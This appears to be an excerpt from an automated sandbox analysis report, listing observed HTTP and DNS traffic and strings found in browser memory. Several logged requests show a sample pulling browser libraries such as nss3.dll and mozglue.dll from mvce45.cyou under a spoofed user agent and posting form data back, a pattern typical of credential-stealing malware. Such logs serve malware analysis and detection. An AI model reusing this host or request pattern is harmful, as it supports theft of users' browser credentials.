                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=K5TeakZvcdonXR3&MD=a3Dubbab HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                          Source: global trafficHTTP traffic detected: GET /sqlo.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIk6HLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIk6HLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                          Source: global trafficHTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.7e27cca6027b8d6697cb.js HTTP/1.1Host: assets2.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732805314&P2=404&P3=2&P4=ZlQSR0zSHDfjzUqjwz%2fxp3k4u3Td9XB4tbyEB84Gj9VYv7p9STdPutddM%2bTclRAlj3H4KOstpTJClMRVe3fjAQ%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: Jp9nUpfGNJUIQebNJEwkGCSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouConnection: Keep-AliveCache-Control: no-cache
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000007.00000003.2111766268.00002FC000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2111641742.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2112190723.00002FC000314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                          Source: chrome.exe, 00000007.00000003.2111766268.00002FC000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2111641742.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2112190723.00002FC000314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                          Source: global trafficDNS traffic detected: DNS query: t.me
                          Source: global trafficDNS traffic detected: DNS query: mvce45.cyou
                          Source: global trafficDNS traffic detected: DNS query: www.google.com
                          Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                          Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                          Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                          Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                          Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                          Source: global trafficDNS traffic detected: DNS query: c.msn.com
                          Source: global trafficDNS traffic detected: DNS query: api.msn.com
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                          Source: msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                          Source: msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                          Source: msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
